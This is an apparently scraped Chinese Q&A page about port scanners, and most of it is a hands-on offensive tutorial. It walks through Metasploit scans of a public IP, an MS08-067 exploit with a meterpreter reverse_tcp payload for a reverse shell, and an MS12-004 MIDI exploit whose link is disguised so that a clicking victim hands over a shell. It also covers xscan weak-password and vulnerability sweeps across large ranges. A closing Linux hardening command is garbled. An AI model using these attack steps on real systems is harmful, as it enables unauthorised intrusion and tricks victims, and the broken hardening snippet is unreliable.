求:网络端口扫描器的算法
闪电1.0 是一个多线程的端口扫描工具,用于进行狂速端口扫描。它具有极快的速度 和方便友好的操作界面,能快速地对大网段范围进行 Connect方式端口扫描。同时具有获取端口标识的功能,可以用来快速地获取端口标识(Banner),能对80端口标识进行特别处理,能方便地获取Web Server类型。当扫描到木马程序端口时,可以提示常见木马。 主要功能如下 ( 1) 发现因特网上的一个网络或者一台主机。 (2) 一旦发现一台主机,就能扫描到开放端口号和提供的服务, 能对常见木马端口返回标识。 (3)可以进行域名正向解析和反向解析。 (4)可以获取局域网在线主机的MAC地址和主机名。 (5)提供了基于窗口Ping功能和局域网信使服务。 (6)可以获取本机网络配制相关信息,如本机IP, 子网掩码,MAC地址,网卡类型和网关IP和DNS的IP。
你可以到 去下载
如何用Metasploit扫描端口
一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具:searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions
我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口,我们这里来扫描80:set PORTS 80
设置扫描目标RHOSTS :set RHOSTS 119.63.37.149
在设置一下线程:set THREADS 100
看一下我们设置好的
这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击
缺点就是扫描的速度有点慢啊
MetaSploit SMB扫描获取系统信息
还是搜索一下smb:searchsmb
这次发现搜出来很多,我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数
设定目标ip:set RHOSTS 192.168.188.140
在设置一下线程:set THREAD 10
然后run一下,查看结果
直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200
MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数,这里讲设置好的参数截图看一下
Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh
在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version
设置下参数
可以看到结果,也没有扫描出来;
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置
这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum
设置好目标和线程后run一下就可以
MetaSploit远程代码执行
搜索一下08-067,使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置
我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数
将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)
比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本
设置一下目标,假设我们目标机器的系统为10:set target 10
这时候,我们再来看一下其参数设置,发现比以前完备了好多
08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter
我们在里面输入shell,就会反弹一个shell
这样整个攻击过程就完成了
MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004
设置下本机ip set SRVHOST ip
然后攻击
会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555
然后生成连接
只要目标点了这个链接,那么我们就会上线一个shell
说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子
Session –I 1(id)
然后输入shell就可以拿到shell
局域网内扫描80端口命令
2、扫锚工具:xscan.exe
基本格式
xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-p 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名(后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
LInux系统怎么防止不让外网通过端口扫描工具扫描服务器端口?
echo "echo 1 /proc/sys/net/ipv4/icmp_echo_ignore_all"/etc/rc.d/rc.local
先不让对方PING到
然后在iptables中添加自己定制的规则。
0条大神的评论